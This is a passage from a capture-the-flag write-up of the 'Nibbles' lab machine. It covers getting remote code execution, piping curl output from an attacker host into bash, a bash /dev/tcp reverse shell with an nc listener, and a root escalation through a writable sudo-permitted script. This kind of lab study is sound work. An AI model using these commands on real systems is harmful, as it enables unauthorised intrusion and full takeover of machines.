   • This command uses curl to fetch data from the IP address {LHOST} and pipes it to the bash command for execution.
2. HTTP Server with Payload:
   • In another terminal, I has set up a HTTP server using Python3 to serve a payload file. The command used is:

      python3 -m http.server 80
     

   • The payload file, let’s say payload.sh, contains the following code:

      bash -c 'bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1'
     

   • This payload establishes a reverse shell to my machine with IP address {LHOST} on port {LPORT}. It uses bashto redirect standard input, output, and error to the specified TCP connection.
3. Execution of Payload
   • THe vulnerable web server downloads the payload.sh file from my machine’s HTTP server using the curl command executed in the RCE payload.
4. Reverse Shell Connection:
   • Once the payload.sh is downloaded, it is executed on the server.
   • The bashcommand in the payload establishes a reverse shell to my machine at IP {LHOST} on port {LPORT}, allowing me to intereact with the server’s shell remotely.
5. Listener for Reverse Shell:
   • In a final terminal, the attacker runs the following command to listen for the incoming reverse shell connection:

      nc -nvlp 443
     

   • I need to wait for the connection from the server, and once established, I gain interactive access to the target system’s shell.

Finally, I go to the directory /home/nibbler and we find the flag on user.txt.

Privilege Scalation

Firstly lets list the priveleges or permissions that I have assigned, to do that I used the command sudo -l. Output

$ nibbler@Nibbles:/home/nibbler$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

If we pay attention we find an interesting zip that is on nibbler directory called monitor.sh that we can execute as root.
It seems that file is on the personal.zip:

$ nibbler@Nibbles:/home/nibbler$ ls
ls
personal
user.txt

Let’s unzip that file to see what’s there with that command:

unzip personal

If we go to monitor.sh we have full permissions to modify the file, so I am gonna establish a reverse shell with my machine, to do that I am gonna write the command that was on payload.sh and I am going to execute with sudoas root:

sudo monitor.sh

Finally, we are root!!!

We have the flag here:

$ root@Nibbles:/home/nibbler/personal/stuff# cd /root
cd /root
$ root@Nibbles:~# ls
ls
root.txt